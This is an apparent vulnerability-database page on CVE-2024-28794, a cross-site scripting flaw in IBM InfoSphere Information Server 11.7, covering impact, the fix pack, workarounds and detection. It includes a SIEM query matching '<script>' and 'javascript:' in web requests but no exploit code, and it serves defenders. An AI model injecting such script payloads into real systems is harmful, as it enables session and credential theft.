Login Sign Up

CVE-2024-28794

5.4 MEDIUM
Cross-Site Scripting

📋 TL;DR

IBM InfoSphere Information Server 11.7 contains a cross-site scripting (XSS) vulnerability that allows authenticated users to inject malicious JavaScript into the web interface. This could enable attackers to steal session credentials or manipulate user sessions. The vulnerability affects organizations running vulnerable versions of IBM InfoSphere Information Server.

💻 Affected Systems

Products:
  • IBM InfoSphere Information Server
Versions: 11.7
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Requires authenticated user access to exploit. All deployments of version 11.7 are affected unless patched.

📦 What is this software?

Infosphere Information Server by Ibm

View all CVEs affecting Infosphere Information Server →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Attackers could steal administrator credentials, gain full control of the InfoSphere environment, and potentially access sensitive data or pivot to other systems.

🟠

Likely Case

Attackers could steal user session cookies or credentials, leading to unauthorized access to the InfoSphere platform and potential data exposure.

🟢

If Mitigated

With proper input validation and output encoding, the risk is reduced to minimal, though the vulnerability still exists in the codebase.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

XSS vulnerabilities are commonly exploited and require authenticated access to the web interface.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Apply fix pack 11.7.1.4 or later

Vendor Advisory: https://www.ibm.com/support/pages/node/7158444

Restart Required: Yes

Instructions:

1. Download the latest fix pack from IBM Fix Central. 2. Apply the fix pack following IBM's installation instructions. 3. Restart the InfoSphere Information Server services.

🔧 Temporary Workarounds

Input Validation Filter

all

Implement web application firewall rules or input validation to block XSS payloads

Content Security Policy

all

Implement strict Content Security Policy headers to limit script execution

🧯 If You Can't Patch

  • Implement network segmentation to restrict access to vulnerable systems
  • Enable strict input validation and output encoding in web application configurations

🔍 How to Verify

Check if Vulnerable:

Check if running IBM InfoSphere Information Server version 11.7 without fix pack 11.7.1.4 or later

Check Version:

Check the InfoSphere Information Server administration console or installation logs for version information

Verify Fix Applied:

Verify that fix pack 11.7.1.4 or later is installed and the version number reflects the update

📡 Detection & Monitoring

Log Indicators:

  • Unusual JavaScript payloads in web request logs
  • Multiple failed XSS attempts

Network Indicators:

  • Suspicious script tags or JavaScript in HTTP requests to InfoSphere endpoints

SIEM Query:

web_requests WHERE (url CONTAINS 'infosphere' AND (payload CONTAINS '<script>' OR payload CONTAINS 'javascript:'))

📊 Metadata

CVE ID: CVE-2024-28794
CVSS v3 Score: 5.4 (MEDIUM)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79
Published: June 30, 2024
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-28794, you might also want to check these:

CVE-2021-39199 10.0

CVE-2021-39199 is a critical cross-site scripting (XSS) vulnerability in the remark-html Node.js lib...

Same vulnerability type (CWE-79)
CVE-2021-32671 10.0

This vulnerability in Flarum forum software allows attackers to inject malicious HTML/JavaScript int...

Same vulnerability type (CWE-79)
CVE-2021-32798 10.0

CVE-2021-32798 is a critical vulnerability in Jupyter Notebook that allows malicious notebook files ...

Same vulnerability type (CWE-79)